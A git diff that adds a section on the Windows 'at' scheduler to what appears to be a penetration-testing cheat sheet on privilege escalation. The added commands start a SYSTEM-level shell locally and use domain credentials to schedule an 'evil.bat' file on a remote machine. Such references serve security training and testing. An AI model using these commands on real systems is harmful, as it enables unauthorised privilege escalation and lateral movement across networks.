diff --git a/privesc/windows/index.md b/privesc/windows/index.md index bb4f8e1..7511fe1 100644 --- a/privesc/windows/index.md +++ b/privesc/windows/index.md @@ -2,4 +2,15 @@ Command that can be executed from the context of a shell prompt that help escalate or increase attacker privilege of the target. - * [UAC](uac.md) - How to bypass UAC. \ No newline at end of file + * [UAC](uac.md) - How to bypass UAC. + +# General Commands +### at (Scheduler) + * **Command with arguments**: `at [TIME] [cmd]` + * **Description**: This command can be used locally to escalate privilege to SYSTEM or be used across a network to execute commands on another system. + * **Examples**: + * Locally - `at 13:20 /interactive cmd` + * Remotely - From http://www.slideshare.net/mubix/windows-attacks-at-is-the-new-black-26665607 + * `net use \\[computername|IP] /user:DOMAIN\username password` + * `net time \\[computername|IP]` + * `at \\[computername|IP] 13:20 c:|temp\evil.bat` \ No newline at end of file